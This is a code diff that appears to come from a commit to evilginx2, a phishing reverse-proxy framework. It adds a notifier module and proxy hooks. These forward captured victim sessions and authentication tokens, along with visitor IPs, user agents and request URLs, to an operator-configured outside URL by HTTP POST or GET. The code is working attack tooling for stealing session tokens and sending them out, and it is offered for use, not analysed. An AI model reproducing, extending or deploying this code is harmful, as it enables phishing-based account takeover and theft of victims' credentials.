fin3ss3g0d · shaolinsec · Feb 14, 2023 · Feb 14, 2023 · Feb 14, 2023 · Feb 14, 2023
diff --git a/evilginx2/core/http_proxy.go b/evilginx2/core/http_proxy.go
@@ -171,8 +171,8 @@ func NewHttpProxy(hostname string, port int, cfg *Config, crt_db *CertDb, db *da
             // Handle clicked link and email opened events
             rid := ""
             browser := map[string]string{}
-            ridr, _ := regexp.Compile(`client_id=([^\"]*)`)
-            trackr, _ := regexp.Compile(`track\?client_id=`)
+            ridr, _ := regexp.Compile(`id=([^\"]*)`)
+            trackr, _ := regexp.Compile(`track\?id=`)
             rid_match := ridr.FindString(req_url)
             opened_match := trackr.FindString(req_url)
             //log.Debug("Track regex", trackr.FindString(req_url))
@@ -288,6 +288,16 @@ func NewHttpProxy(hostname string, port int, cfg *Config, crt_db *CertDb, db *da
                                     //p.whitelistIP(remote_addr, ps.SessionId)
 
                                     req_ok = true
+				    for _, n := range p.cfg.notifiers {
+					if n.OnEvent == "visitor" && n.Enabled {
+						session, _ := p.db.GetSessionBySid(session.Id)
+						log.Info("[%d] [%s] forwarding visitor info to notifier url %s", sid, hiblue.Sprint(pl_name), n.Url)
+						err := NotifyOnVisitor(n, *session, req.URL)
+						if err != nil {
+							log.Error("notifier: %v", err)
+						}
+					}
+				}
                                 }
                             } else {
                                 log.Warning("[%s] unauthorized request: %s (%s) [%s]", hiblue.Sprint(pl_name), req_url, req.Header.Get("User-Agent"), remote_addr)
@@ -300,6 +310,16 @@ func NewHttpProxy(hostname string, port int, cfg *Config, crt_db *CertDb, db *da
                                         log.Warning("blacklisted ip address: %s", from_ip)
                                     }
                                 }
+
+				for _, n := range p.cfg.notifiers {
+					if n.OnEvent == "unauthorized" && n.Enabled {
+						log.Info("[%s] forwarding unauthorized request to notifier url %s", hiblue.Sprint(pl_name), n.Url)
+						err := NotifyOnUnauthorized(n, pl_name, req_url, req.Header.Get("User-Agent"), remote_addr)
+						if err != nil {
+							log.Error("notifier: %v", err)
+						}
+					}
+				}
                                 return p.blockRequest(req)
                             }
                         } else {
@@ -747,7 +767,17 @@ func NewHttpProxy(hostname string, port int, cfg *Config, crt_db *CertDb, db *da
                                     if err := p.db.SetSessionTokens(ps.SessionId, s.Tokens); err != nil {
                                         log.Error("database: %v", err)
                                     }
-                                    s.IsDone = true
+                                    for _, n := range p.cfg.notifiers {
+					if n.OnEvent == "authenticated" && n.Enabled {
+						session, _ := p.db.GetSessionBySid(ps.SessionId)
+						log.Info("[%d] forwarding captured session to notifier url %s", ps.Index, n.Url)
+						err := NotifyOnAuth(n, *session, pl)
+						if err != nil {
+							log.Error("notifier: %v", err)
+						}
+					}
+				}
+				s.IsDone = true
                                 }
                             }
                         }

diff --git a/evilginx2/core/notifiers.go b/evilginx2/core/notifiers.go
@@ -0,0 +1,116 @@
+package core
+
+import (
+	"bytes"
+	"encoding/json"
+	"fmt"
+	"net/http"
+	"net/url"
+	"time"
+
+	"github.com/kgretzky/evilginx2/database"
+)
+
+type Unauthorized struct {
+	Phishlet    string `json:"phishlet"`
+	Req_url     string `json:"req_url"`
+	Useragent   string `json:"useragent"`
+	Remote_addr string `json:"remote_addr"`
+}
+
+type Visitor struct {
+	Session database.Session
+	Tokens  string `json:"tokens"`
+}
+
+// sets up a http.Request with correct Method.
+func NotifyReturnReq(n *Notify, body interface{}) (req http.Request, err error) {
+	if n.Method == "GET" {
+		Body, _ := json.Marshal(body)
+		req, err := http.NewRequest(http.MethodGet, n.Url, bytes.NewBuffer(Body))
+
+		return *req, err
+	}
+	if n.Method == "POST" {
+		Body, _ := json.Marshal(body)
+		req, err := http.NewRequest(http.MethodPost, n.Url, bytes.NewBuffer(Body))
+
+		req.Header.Add("Content-Type", "application/json")
+		return *req, err
+	}
+	return req, err
+}
+
+// configures and sends the http.Request
+func NotifierSend(n *Notify, body interface{}) error {
+	req, err := NotifyReturnReq(n, body)
+	if err != nil {
+		return err
+	}
+
+	if n.AuthHeaderName != "" && n.AuthHeaderValue != "" {
+		req.Header.Add(n.AuthHeaderName, n.AuthHeaderValue)
+	}
+
+	if n.BasicAuthUser != "" && n.BasicAuthPassword != "" {
+		req.SetBasicAuth(n.BasicAuthUser, n.BasicAuthPassword)
+	}
+
+	client := &http.Client{Timeout: 10 * time.Second}
+	_, errreq := client.Do(&req)
+	if errreq != nil {
+		return errreq
+	}
+	return nil
+}
+
+// prepares the Body for unauthorized requests and triggers NotifierSend
+func NotifyOnUnauthorized(n *Notify, pl_name string, Req_url string, useragent string, remote_addr string) error {
+	b := Unauthorized{
+		Phishlet:    pl_name,
+		Req_url:     Req_url,
+		Useragent:   useragent,
+		Remote_addr: remote_addr,
+	}
+
+	err := NotifierSend(n, b)
+	if err != nil {
+		return err
+	}
+	return nil
+}
+
+// prepares the Body for visitors and triggers NotifierSend
+func NotifyOnVisitor(n *Notify, session database.Session, url *url.URL) error {
+	s := session
+	b := Visitor{
+		Session: s,
+	}
+
+	query := url.Query()
+	if n.ForwardParam != "" && query[n.ForwardParam] != nil {
+		n.Url = fmt.Sprintf("%s/?%s=%s", n.Url, n.ForwardParam, query[n.ForwardParam][0])
+	}
+
+	err := NotifierSend(n, b)
+	if err != nil {
+		return err
+	}
+	return nil
+}
+
+// prepares the Body for authorized requests and triggers NotifierSend
+func NotifyOnAuth(n *Notify, session database.Session, phishlet *Phishlet) error {
+	s := session
+	p := *phishlet
+	b := Visitor{
+		Session: s,
+		Tokens:  tokensToJSON(&p, s.Tokens),
+	}
+
+	err := NotifierSend(n, b)
+	if err != nil {
+		return err
+	}
+	return nil
+}